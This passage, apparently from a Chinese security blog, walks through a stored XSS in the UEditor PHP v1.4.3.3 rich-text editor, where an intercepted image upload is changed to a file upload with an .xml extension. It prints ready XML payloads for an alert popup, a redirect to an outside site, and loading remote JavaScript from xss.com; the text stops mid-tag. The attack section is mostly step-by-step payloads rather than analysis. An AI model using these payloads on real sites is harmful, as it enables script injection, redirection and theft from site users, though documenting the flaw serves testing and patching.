大神论坛 UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS

最新推荐文章于 2024-04-12 14:45:00 发布

原创

最新推荐文章于 2024-04-12 14:45:00 发布 · 2.2k 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#安全漏洞

本文详细介绍了Ueditor富文本编辑器在php版v1.4.3.3中的XML文件上传导致的存储型XSS漏洞，包括复现步骤、影响版本及.NET、PHP版本的文件上传漏洞，以及SSRF和另一处XSS漏洞。黑客可利用这些漏洞上传木马文件，执行命令控制服务器。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一、Ueditor最新版XML文件上传导致存储型XSS

测试版本：php版 v1.4.3.3

下载地址：https://github.com/fex-team/ueditor 复现步骤：

1. 上传一个图片文件

在这里插入图片描述

2. 然后buprsuit抓包拦截

在这里插入图片描述

3.将uploadimage类型改为uploadfile，并修改文件后缀名为xml,最后复制上xml代码即可

在这里插入图片描述

4. 即可弹出xss

在这里插入图片描述

请注意http://controller.xxx的访问路径

http://192.168.10.1/ueditor1433/php/controller.php?action=listfile

在这里插入图片描述

常见的xml弹窗POC:

弹窗xss:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1);
</something:script>
</body>
</html>

URL跳转:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> window.location.href="https://www.t00ls.net/";
</something:script>
</body>
</html>

远程加载Js:

<html>
<head></head>
<body>
<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">
</something:script>
</b